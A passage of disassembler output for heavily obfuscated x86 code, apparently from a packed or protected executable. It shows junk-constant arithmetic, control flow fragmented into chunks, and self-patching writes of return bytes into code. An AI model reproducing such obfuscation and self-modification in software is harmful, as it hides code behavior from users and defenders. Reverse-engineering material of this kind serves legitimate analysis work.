; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_441048:				; CODE XREF: sub_43B6A5:loc_459F41j
		push	0BBE1974Bh
		pop	eax
		add	eax, 723E5E1Eh
		cmp	eax, 0EF593F1Eh
		jmp	loc_451E72
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_44105F:				; CODE XREF: sub_4544DD:loc_442D85j
		xor	ebp, edx
		test	ebp, 0F6E649A1h
		jmp	loc_43EB77
; END OF FUNCTION CHUNK	FOR sub_4544DD

; =============== S U B	R O U T	I N E =======================================



sub_44106C	proc near		; DATA XREF: sub_4589A2-6872o
		mov	ds:dword_45A8A0, eax
		xor	eax, eax
		mov	ds:dword_4510BC, eax
		jmp	loc_45B14E
sub_44106C	endp


; =============== S U B	R O U T	I N E =======================================



sub_44107D	proc near		; CODE XREF: sub_43A87Ej

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043A4F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AA70 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0043E636 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A0BF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D1BA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044E3DB SIZE 00000035 BYTES
; FUNCTION CHUNK AT 0044F3FB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044FFFE SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00455C9E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A971 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045B140 SIZE 00000019 BYTES

		push	ebp
		jmp	loc_44D1BA
sub_44107D	endp


; =============== S U B	R O U T	I N E =======================================



sub_441083	proc near		; DATA XREF: sub_43E063+D4ACo
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
sub_441083	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43E063

loc_44108A:				; CODE XREF: sub_452585-124C4j
					; sub_43C0DE+940Fj ...
		jb	loc_4440B6
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		jmp	loc_44FCE9
; END OF FUNCTION CHUNK	FOR sub_43E063
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_208. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_4410A0:				; CODE XREF: sub_440643+11851j
		jmp	loc_447AA1
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF23

loc_4410A5:				; CODE XREF: sub_43BF23+158F8j
		jmp	nullsub_286
; END OF FUNCTION CHUNK	FOR sub_43BF23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_4410AA:				; CODE XREF: sub_43F227:loc_44B539j
		cmp	dword ptr [eax], 47424454h
		jz	loc_43BCB4
		jmp	loc_439AFE
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E65

loc_4410BB:				; CODE XREF: sub_443E65+Fj
		call	sub_44AAC1
; END OF FUNCTION CHUNK	FOR sub_443E65
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4410C0:				; CODE XREF: sub_4465A6+8j
		jmp	loc_44052A
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_4410C5:				; CODE XREF: hvvrg7ie:loc_453255j
		adc	ebx, 0F9B12B12h
		jl	loc_43A766
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_4410D1:				; CODE XREF: sub_4413A5+11E99j
		xor	ecx, 0A6C589EDh
		add	eax, ecx
		xchg	edi, [esp+0]
		jmp	loc_43C9EE
; END OF FUNCTION CHUNK	FOR sub_4413A5

; =============== S U B	R O U T	I N E =======================================



sub_4410E1	proc near		; CODE XREF: hvvrg7ie:0044CD83j
					; sub_43D5FD+1635Cp

; FUNCTION CHUNK AT 004403E7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004455B4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004467E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045172C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E85 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045861C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004588E8 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		push	8C1467BAh
		jmp	loc_4467E7
sub_4410E1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4410F0:				; CODE XREF: sub_44D2F8-FA5Cj
		jb	loc_4564CD
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_4410F6:				; CODE XREF: sub_44616F:loc_440C82j
		sub	edi, 0CAC526EDh
		add	edi, 0C739FBF5h
		push	offset sub_443358
		jmp	loc_44EC48
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
		mov	eax, 5389CFC1h
		call	sub_450C5A
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		jmp	loc_43EFAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459E78

loc_441121:				; CODE XREF: sub_459E78+Ej
		call	sub_45329F
		mov	eax, 0B98DBDD7h
		push	edi
		push	offset sub_43A04B
		jmp	loc_43D5E9
; END OF FUNCTION CHUNK	FOR sub_459E78
; ---------------------------------------------------------------------------
		jmp	ds:off_41D094
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_44113C:				; CODE XREF: sub_4414F6-5BFBj
					; sub_4414F6:loc_444306j ...
		pop	edx
		jo	loc_45A4B7
		mov	eax, [esp-8+arg_4]
		push	edx
		jmp	loc_43A170
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_44114C:				; CODE XREF: sub_45541B:loc_450CEBj
		push	edi
		add	edx, 8A1F6CBCh
		jmp	loc_44461B
; END OF FUNCTION CHUNK	FOR sub_45541B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_441158:				; CODE XREF: sub_44736C:loc_454689j
					; DATA XREF: sub_4426E2:loc_440786o
		rol	eax, 6
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_44736C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45717D

loc_44115D:				; CODE XREF: sub_45717D+1j
		jmp	loc_45866F
; END OF FUNCTION CHUNK	FOR sub_45717D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F71

loc_441162:				; CODE XREF: sub_455F71-1A38Aj
		jmp	nullsub_308
; END OF FUNCTION CHUNK	FOR sub_455F71

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_441167	proc near		; CODE XREF: sub_4410E1-CF9p

; FUNCTION CHUNK AT 00439CD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E308 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044D932 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004506AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004558CB SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045891A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AF36 SIZE 0000001F BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		call	sub_43ECAA

loc_441172:				; CODE XREF: sub_44E68D+9F78j
		jmp	loc_43E308
sub_441167	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		ror	eax, 11h
		push	edi
		jmp	loc_455C49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_441186:				; CODE XREF: sub_449425:loc_444BC6j
		sub	edx, edi
		jl	loc_442272
		jmp	loc_4559DB
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
		add	ebx, esi
		xor	esi, 0A3A208B4h
		jmp	sub_44D4EF
; ---------------------------------------------------------------------------

loc_4411A0:				; DATA XREF: sub_458374:loc_455C3Fo
		add	eax, 53453DF4h
		add	eax, ebp
		add	eax, 54B291E0h
		mov	eax, [eax]
		jmp	loc_4436B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_4411B5:				; CODE XREF: sub_455B9C:loc_44FD51j
		add	eax, 187704Eh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_44984D
		jmp	loc_4450B2
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_4411CA:				; CODE XREF: sub_44A6D7:loc_447BFFj
					; sub_44A6D7+7E8Cj
		mov	eax, [esp+0]
		push	eax
		mov	eax, esi
		xchg	eax, [esp+0]
		call	sub_4526CF
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; START	OF FUNCTION CHUNK FOR sub_441FD1

loc_4411D8:				; CODE XREF: sub_441FD1+Ej
		jmp	nullsub_294
; END OF FUNCTION CHUNK	FOR sub_441FD1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_179. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456784

loc_4411DE:				; CODE XREF: sub_456784-2CEBj
		jmp	sub_439549
; END OF FUNCTION CHUNK	FOR sub_456784
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456763

loc_4411E3:				; CODE XREF: sub_456763:loc_45522Aj
		mov	ebx, [ecx]
		jnz	loc_4574FE
		jmp	loc_4471B8
; END OF FUNCTION CHUNK	FOR sub_456763
; ---------------------------------------------------------------------------

loc_4411F0:				; CODE XREF: hvvrg7ie:0044A533j
		jb	loc_4547BE

; =============== S U B	R O U T	I N E =======================================



sub_4411F6	proc near		; CODE XREF: sub_449425+EE70p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044255D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447D6E SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ebp, [esp-4+arg_0]
		mov	edx, ebp
		jmp	loc_447D6E
sub_4411F6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449466

loc_441204:				; CODE XREF: sub_449466:loc_43D51Ej
					; sub_450434:loc_459A2Ej
		mov	byte ptr [eax],	0C3h
		jmp	sub_446B4C
; END OF FUNCTION CHUNK	FOR sub_449466
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_44120C:				; CODE XREF: sub_446B4Cj
		call	sub_453E86

loc_441211:				; CODE XREF: sub_44D2F8-EE24j
		jns	loc_440B88
		cmp	edx, ebx

loc_441219:				; CODE XREF: sub_44D98D+53EBj
		jmp	loc_443DE3
; END OF FUNCTION CHUNK	FOR sub_446B4C

; =============== S U B	R O U T	I N E =======================================



sub_44121E	proc near		; DATA XREF: sub_452278+Do

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043A32C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044047F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A02 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00459D27 SIZE 00000018 BYTES

		ror	eax, 1Ch
		push	edx
		push	0E6F686A2h
		pop	edx
		rol	edx, 9
		jmp	loc_446A02
sub_44121E	endp


; =============== S U B	R O U T	I N E =======================================



sub_441230	proc near		; CODE XREF: sub_454099-1B092p
					; hvvrg7ie:0044FE19j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044841D SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ecx, 288750EDh
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_44841D
sub_441230	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_441242	proc near		; CODE XREF: sub_4554E8-8904p
					; hvvrg7ie:0044DBA0j

; FUNCTION CHUNK AT 00444DC8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455DE0 SIZE 00000023 BYTES

		xchg	esi, [esp+0]
		pop	esi
		shl	eax, 3
		add	eax, [ebp-8]
		push	edx
		push	0AFAEFF9h
		jmp	loc_444DC8
sub_441242	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_441257:				; CODE XREF: sub_450434-4A37j
		jnz	loc_4449B6
		jmp	loc_458756
; END OF FUNCTION CHUNK	FOR sub_450434
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_395. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2D1

loc_441263:				; CODE XREF: sub_44A2D1:loc_451A27j
		push	3CAC080Ah
		pop	esi
		sub	esi, 20A94145h
		add	esi, 0C54BA5A9h
		and	esi, 0C232330h
		jmp	loc_456B80
; END OF FUNCTION CHUNK	FOR sub_44A2D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45541B

loc_441280:				; CODE XREF: sub_45541B:loc_44D5C5j
		jnz	loc_44461B
		jmp	loc_450CEB
; END OF FUNCTION CHUNK	FOR sub_45541B

; =============== S U B	R O U T	I N E =======================================



sub_44128B	proc near		; CODE XREF: hvvrg7ie:00456102j
					; sub_44C6D7+D71Ep
		xchg	eax, [esp+0]
		pop	eax
		pop	ebp
		retn
sub_44128B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_441291:				; CODE XREF: sub_4465A6:loc_4450A3j
		sub	esi, 131DE143h
		pushf
		jmp	loc_444DE2
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_44129D:				; CODE XREF: hvvrg7ie:loc_446C17j
		mov	edx, edi
		mov	ebx, 0D475871Bh
		jmp	loc_451C6F
; ---------------------------------------------------------------------------
		mov	esi, ebx
		jmp	loc_457A91
; ---------------------------------------------------------------------------
		test	eax, eax
		jnz	loc_45A963
		jmp	loc_45A6F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403D4

loc_4412BD:				; CODE XREF: sub_4403D4:loc_439238j
		test	eax, 0E64B3DFDh
		jmp	loc_459176
; END OF FUNCTION CHUNK	FOR sub_4403D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AC3B

loc_4412C8:				; CODE XREF: sub_43AC3B:loc_448783j
		call	sub_45A889

loc_4412CD:				; CODE XREF: sub_447ADE+9j
		jmp	loc_44DAF8
; END OF FUNCTION CHUNK	FOR sub_43AC3B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_4412D2:				; CODE XREF: sub_43ECAA+Bj
		or	eax, eax
		jnz	loc_43B86C
		jmp	loc_44CF3C
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; ---------------------------------------------------------------------------

loc_4412DF:				; CODE XREF: hvvrg7ie:00449F94j
		and	ebx, 4CDE162Fh

loc_4412E5:				; CODE XREF: hvvrg7ie:00449F7Dj
		add	edi, 0D151733Eh
		xchg	edi, [esp]
		jmp	loc_445565
; ---------------------------------------------------------------------------
		mov	eax, 1AABF86Ch
		push	edx
		push	6DD53A33h
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_4412FE:				; CODE XREF: sub_4557D4:loc_445C26j
		pop	edx
		jmp	loc_43A67C
; END OF FUNCTION CHUNK	FOR sub_4557D4
; ---------------------------------------------------------------------------

loc_441304:				; CODE XREF: hvvrg7ie:0043B932j
		mov	edx, ebx

loc_441306:				; CODE XREF: hvvrg7ie:loc_44819Cj
		mov	eax, [esp]
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		jmp	loc_43F8A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_441314:				; CODE XREF: sub_45061E+11j
		xor	edx, 259563C4h
		or	edx, 9E2C620h
		add	edx, 0F8A51C71h
		jnz	loc_4554A1

loc_44132C:				; CODE XREF: sub_4426F3+Dj
		jmp	nullsub_176
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
		mov	[edx], ebx
		jmp	loc_45564E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D37

loc_441338:				; CODE XREF: sub_454D37+16j
		cdq

loc_441339:				; CODE XREF: hvvrg7ie:loc_45A931j
		push	esi
		mov	esi, ecx
		xchg	esi, [esp+4+var_4]
		push	287F9554h
		jmp	loc_43F52B
; END OF FUNCTION CHUNK	FOR sub_454D37
; ---------------------------------------------------------------------------
		push	ecx
		push	6D98FB63h
		pop	ecx
		rol	ecx, 1Ch
		and	ecx, 0F38A6458h
		jmp	loc_449F2E
; ---------------------------------------------------------------------------

loc_44135E:				; CODE XREF: hvvrg7ie:0043D0B2j
		add	edx, 55B8AD17h

loc_441364:				; CODE XREF: hvvrg7ie:loc_43F280j
		xchg	edx, [esp]
		jmp	loc_44DF2F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_230. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B7B9

loc_44136D:				; CODE XREF: sub_43B7B9+4F72j
		jmp	loc_451F37
; END OF FUNCTION CHUNK	FOR sub_43B7B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451669

loc_441372:				; CODE XREF: sub_451669+174Ej
		jge	loc_43FCE7

loc_441378:				; CODE XREF: hvvrg7ie:0044E916j
		jmp	loc_45165A
; END OF FUNCTION CHUNK	FOR sub_451669
; ---------------------------------------------------------------------------
		shr	ebx, 0Eh
		jmp	loc_43FCE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_441385:				; CODE XREF: sub_45061E:loc_4510B4j
		jbe	loc_4458BE
		jmp	loc_4434CC
; END OF FUNCTION CHUNK	FOR sub_45061E

; =============== S U B	R O U T	I N E =======================================



sub_441390	proc near		; DATA XREF: sub_44AE37+D241o

; FUNCTION CHUNK AT 0043F3CF SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		jmp	loc_43F3CF
sub_441390	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B3C

loc_441398:				; CODE XREF: sub_442B3C+10j
		or	eax, eax
		jnz	loc_44E815
		jmp	loc_449394
; END OF FUNCTION CHUNK	FOR sub_442B3C

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4413A5	proc near		; CODE XREF: sub_43B248+6j

var_4		= dword	ptr -4
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00439985 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B1C8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043B7D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C9EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D442 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043DE30 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043FF73 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004410D1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004417C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441935 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442A5C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442F10 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443EC7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445D5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A0A1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D713 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD80 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044E360 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00450836 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453232 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004540D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458D26 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0045A324 SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		pop	ebp
		push	732622DDh
		jmp	loc_4417C6
sub_4413A5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_4413B6:				; CODE XREF: sub_43CD0B:loc_445F25j
		jnz	loc_4439AD
		jmp	loc_44B386
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43931C

loc_4413C1:				; CODE XREF: sub_43931C+105F6j
		jl	loc_4561FB
		sub	eax, 21B15254h
		jmp	loc_4555D8
; END OF FUNCTION CHUNK	FOR sub_43931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_4413D2:				; CODE XREF: sub_44D2F8:loc_4452BEj
		cmp	dword ptr [ebp-4], 2
		jnz	loc_454587
		jmp	loc_44686D
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B36F

loc_4413E1:				; CODE XREF: sub_43B36F+1Fj
		pushf
		push	143C5A47h
		pop	edi
		rol	edi, 0Fh
		and	edi, 525CF658h
		rol	edi, 16h
		add	edi, 7A43F5C2h
		jmp	loc_44C97F
; END OF FUNCTION CHUNK	FOR sub_43B36F

; =============== S U B	R O U T	I N E =======================================



sub_4413FF	proc near		; DATA XREF: sub_44616F:loc_453971o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00439AF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00439BE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E51C SIZE 00000017 BYTES

		push	edx
		push	ecx
		push	0FFB44913h
		pop	ecx
		jmp	loc_439BE4
sub_4413FF	endp

; ---------------------------------------------------------------------------
		adc	ebx, esi
		jmp	sub_45974C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_441413:				; CODE XREF: sub_458F33-1882j
		jz	loc_455AB6
		jmp	loc_44C850
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------

locret_44141E:				; CODE XREF: hvvrg7ie:loc_4495A1j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4512A0

loc_44141F:				; CODE XREF: sub_4512A0-151E6j
		jmp	nullsub_219
; END OF FUNCTION CHUNK	FOR sub_4512A0
; ---------------------------------------------------------------------------
		rol	edi, 12h
		jmp	loc_4483D4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_394. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	esi, 0E6215129h
		jmp	loc_454E99
; ---------------------------------------------------------------------------

loc_441438:				; DATA XREF: sub_43ECAA:loc_4539C5o
		call	sub_43D16B
		mov	edx, 0F9A79DECh
		call	sub_446A16
		push	eax
		ror	eax, 3
		push	offset sub_43B85B
		jmp	loc_447A1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_441455:				; CODE XREF: sub_454099:loc_44BAABj
		jnz	loc_441905
		mov	ebx, [ecx]
		adc	edx, ebp
		jmp	loc_456DF8
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439873

loc_441464:				; CODE XREF: sub_439873+13223j
		jz	loc_441C18
		jmp	loc_450E78
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------

loc_44146F:				; CODE XREF: hvvrg7ie:0044FC37j
		inc	dword ptr [ebp-24h]
		jmp	loc_43BFF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_441477:				; CODE XREF: sub_445F2A-1417j
					; sub_448100-644j ...
		mov	eax, [ebp-10h]
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------

loc_44147E:				; CODE XREF: hvvrg7ie:004586AAj
		jmp	sub_44059F
; ---------------------------------------------------------------------------

loc_441483:				; CODE XREF: hvvrg7ie:0045743Dj
		jmp	loc_43D6BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450246

loc_441488:				; CODE XREF: sub_450246-1A51j
					; sub_4514A2+Bj ...
		inc	dword ptr [ebp-20h]
		dec	dword ptr [ebp-2Ch]
		jnz	loc_446CD6
		jmp	loc_44D13E
; END OF FUNCTION CHUNK	FOR sub_450246
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_441499:				; CODE XREF: sub_44059F+19639j
		jnz	loc_4532C8
		jmp	loc_439CC9
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		jle	sub_44F548
		shl	ecx, 11h
		jmp	sub_445B1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_4414B2:				; CODE XREF: sub_442FD1-259Aj
		push	6983F3AEh
		pop	ebx
		rol	ebx, 0Ah
		add	ebx, 0D9B00A24h
		and	ebx, 7A9B1068h
		xor	ebx, 681A0074h
		popf
		jmp	loc_453AFE
; END OF FUNCTION CHUNK	FOR sub_442FD1

; =============== S U B	R O U T	I N E =======================================



sub_4414D3	proc near		; DATA XREF: sub_43F227-3AEo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004394E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AD68 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AECE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043B9B5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441EF0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446BBD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447A06 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449794 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00457DD5 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00458DB2 SIZE 00000005 BYTES

		mov	eax, [eax]
		or	eax, eax
		jnz	loc_43AECE
		jmp	loc_458DB2
sub_4414D3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ds:off_41D090, eax
		lea	eax, loc_44B7EA
		mov	byte ptr [eax],	0C3h
		jmp	loc_449E3C

; =============== S U B	R O U T	I N E =======================================



sub_4414F6	proc near		; CODE XREF: sub_4147FC+8p
					; hvvrg7ie:00441136j
					; DATA XREF: ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00439562 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043A170 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B8EB SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043C6DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D07C SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044113C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00444306 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004461E2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00449EA4 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044ABB2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044D0B7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FCB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452DED SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00454063 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455CAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457AAF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A4B7 SIZE 0000000A BYTES

		push	esi

loc_4414F7:				; CODE XREF: hvvrg7ie:0044DCA9j
		jmp	loc_44FCB6
sub_4414F6	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_100. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DB2

loc_4414FD:				; CODE XREF: sub_448DB2+22j
		jmp	loc_44AF0A
; END OF FUNCTION CHUNK	FOR sub_448DB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444C6D

loc_441502:				; CODE XREF: sub_444C6D+Ej
		jmp	nullsub_306
; END OF FUNCTION CHUNK	FOR sub_444C6D
; ---------------------------------------------------------------------------

loc_441507:				; CODE XREF: hvvrg7ie:loc_44C62Ej
		xor	eax, 51912920h
		add	eax, ebp
		add	eax, 0D8322275h
		push	eax
		push	0D159E263h
		pop	eax
		jmp	loc_451559
; ---------------------------------------------------------------------------
		push	offset loc_43A765
		jmp	locret_4577F1
; ---------------------------------------------------------------------------

loc_44152B:				; CODE XREF: hvvrg7ie:loc_440E12j
		jz	loc_447172
		jmp	loc_4451D5
; ---------------------------------------------------------------------------
